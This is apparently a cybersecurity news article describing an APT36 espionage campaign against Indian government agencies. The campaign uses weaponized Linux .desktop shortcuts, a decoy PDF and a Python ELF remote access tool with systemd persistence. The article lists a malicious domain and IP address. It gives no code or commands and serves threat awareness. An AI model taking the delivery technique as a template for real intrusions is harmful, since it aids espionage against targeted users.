Pakistan-based threat actor APT36, also known as Transparent Tribe, has launched a sophisticated cyber-espionage campaign against Indian government institutions using a newly developed Python-based ELF malware.
The attack marks a significant escalation in the group’s capabilities, demonstrating their growing technical maturity and adaptability to Linux-based operating systems.
The campaign centers on spear-phishing emails containing weaponized Linux shortcut files designed to deceive government employees.
When recipients extract and open these files, the malware silently downloads and executes malicious components in the background while displaying seemingly harmless content to the user.
This dual-layer approach allows the attackers to maintain stealth while establishing persistent access to critical infrastructure. APT36’s shift toward Linux targeting represents a strategic evolution in their operational doctrine.
The group has historically focused on Windows-based attacks, but this new campaign reveals their commitment to targeting the BOSS operating system, which is widely deployed across Indian government agencies.
By adapting their tools to exploit multiple platforms, the threat actors significantly expand their attack surface and operational effectiveness.
Cyfirma security analysts identified the malware after discovering the weaponized .desktop files being distributed through targeted phishing campaigns.
.webp "APT36 Hackers Used Python-Based ELF Malware to Target Indian Government Entities 3")
The researchers noted that the infection chain begins with a deceptive archive file containing the malicious shortcut, which triggers a multi-stage payload delivery process.
Once executed, the shortcut downloads a decoy PDF document to distract the user while simultaneously fetching and installing the actual ELF malware payload from attacker-controlled servers.
Malware’s infection mechanism
The malware’s infection mechanism relies on .desktop files as intermediary delivery vectors, allowing the threat actors to conceal their malicious intent while maintaining flexibility in payload deployment.
Unlike directly transmitting ELF binaries, which security systems can more easily detect, .desktop files appear legitimate to Linux users while running embedded commands.
.webp "APT36 Hackers Used Python-Based ELF Malware to Target Indian Government Entities 4")
Source code of the bash file (Source – Cyfirma)
This approach enables dynamic payload retrieval and significantly reduces forensic evidence.
.webp "APT36 Hackers Used Python-Based ELF Malware to Target Indian Government Entities 5")
Analysis of the extracted malware reveals a feature-rich remote access tool capable of executing arbitrary shell commands, establishing command-and-control communication, capturing screenshots, and exfiltrating data.
The malware uses systemd user-level services to establish persistence, ensuring it continues running across system reboots and user sessions.
Researchers discovered that the threat actor strategically uses the .desktop file format combined with shell script execution to bypass traditional security controls and maintain undetected presence.
The campaign infrastructure uses recently registered domains and compromised servers located in multiple countries.
The malicious domain lionsdenim[.]xyz, registered just 22 days prior, combined with IP address 185.235.137.90 in Frankfurt, facilitates payload delivery.
Indian government agencies should implement immediate mitigation measures, including enhanced email security, endpoint detection and response solutions, and strict application authorization policies to counter this persistent threat.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
